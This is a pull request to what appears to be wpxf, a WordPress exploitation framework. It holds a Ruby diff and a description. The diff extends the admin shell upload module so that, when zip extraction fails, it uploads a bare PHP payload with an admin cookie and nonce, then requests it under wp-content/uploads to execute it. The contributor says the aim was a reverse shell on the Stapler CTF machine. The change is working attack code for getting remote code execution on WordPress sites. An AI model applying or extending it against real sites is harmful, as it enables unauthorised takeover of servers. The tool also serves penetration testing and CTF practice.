### PR TITLE
upload non-encapsulated payload when zip installation fails

### DIFF
--- a/lib/wpxf/wordpress/plugin.rb
+++ b/lib/wpxf/wordpress/plugin.rb
@@ -28,6 +28,18 @@ module Wpxf::WordPress::Plugin
     res&.code == 200
   end
 
+  # Create and upload the payload without encapsulating it.
+  # @param payload_name [String] the name the payload should use on the server.
+  # @param cookie [String] a valid admin session cookie.
+  # @return [Boolean] true on success, false on error.
+  def wordpress_upload_payload_only(payload_name, cookie)
+    nonce = wordpress_plugin_upload_nonce(cookie)
+    return false if nonce.nil?
+
+    res = wordpress_upload_payload(payload_name, cookie, nonce)
+    res&.code == 200
+  end
+
   # Upload and execute a payload as a plugin.
   # @param plugin_name [String] the name of the plugin.
   # @param payload_name [String] the name the payload should use on the server.
@@ -35,11 +47,25 @@ module Wpxf::WordPress::Plugin
   # @return [HttpResponse, nil] the {Wpxf::Net::HttpResponse} of the request.
   def wordpress_upload_and_execute_payload_plugin(plugin_name, payload_name, cookie)
     unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
-      emit_error 'Failed to upload the payload'
+      emit_error 'Failed to upload the plugin'
       return nil
     end
 
     payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    emit_info "Executing the payload at #{payload_url}..."
+    res = execute_get_request(url: payload_url)
+
+    if res&.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+      return res
+    end
+
+    unless wordpress_upload_payload_only(payload_name, cookie)
+      emit_error 'Failed to upload the payload'
+      return nil
+    end
+
+    payload_url = normalize_uri(wordpress_url_uploads, "#{payload_name}.php")
     emit_info "Executing the payload at #{payload_url}..."
     res = execute_get_request(url: payload_url)
 
@@ -86,6 +112,19 @@ module Wpxf::WordPress::Plugin
     end
   end
 
+  # Build the body and return the response of the request.
+  def wordpress_upload_payload(payload_name, cookie, nonce)
+    builder = wordpress_payload_upload_builder(payload_name, nonce)
+    builder.create do |body|
+      return execute_post_request(
+        url: wordpress_url_admin_update,
+        params: { 'action' => 'upload-plugin' },
+        body: body,
+        cookie: cookie
+      )
+    end
+  end
+
   # A hash containing the file paths and contents for the ZIP file.
   def wordpress_plugin_files(plugin_name, payload_name)
     plugin_script = wordpress_generate_plugin_header(plugin_name)
@@ -102,6 +141,16 @@ module Wpxf::WordPress::Plugin
     builder.add_field('_wpnonce', nonce)
     builder.add_field('_wp_http_referer', wordpress_url_plugin_upload)
     builder.add_zip_file('pluginzip', zip_fields, "#{plugin_name}.zip")
+    builder.add_field('install-plugin-submit', 'Install Now')
+    builder
+  end
+
+  # A {BodyBuilder} with the required fields to upload a payload.
+  def wordpress_payload_upload_builder(payload_name, nonce)
+    builder = Wpxf::Utility::BodyBuilder.new
+    builder.add_field('_wpnonce', nonce)
+    builder.add_field('_wp_http_referer', wordpress_url_plugin_upload)
+    builder.add_file_from_string('pluginzip', payload.encoded, "#{payload_name}.php")
     builder.add_field('install-plugin-submit', 'Install Now')
     builder
   end


### PR DESCRIPTION
When playng the Stapler CTF (https://www.vulnhub.com/entry/stapler-1,150/) I realized that wpxf wouldn't able to get a reverse shell using the admin_shell_upload module. The module was able to upload the zip file in wp-content/uploads/ but wasn't able to extract it to wp-content/plugins/ because lack of permissions on this dir. I don't know if this is a common behaviour. I wrote a workaround that uploads directly the php payload file (without encapsulating it in a zip) and then accesses the payload in wp-content/uploads/PAYLOADNAME.php

I apologize for any mistake in my code. I'm not familiar with ruby.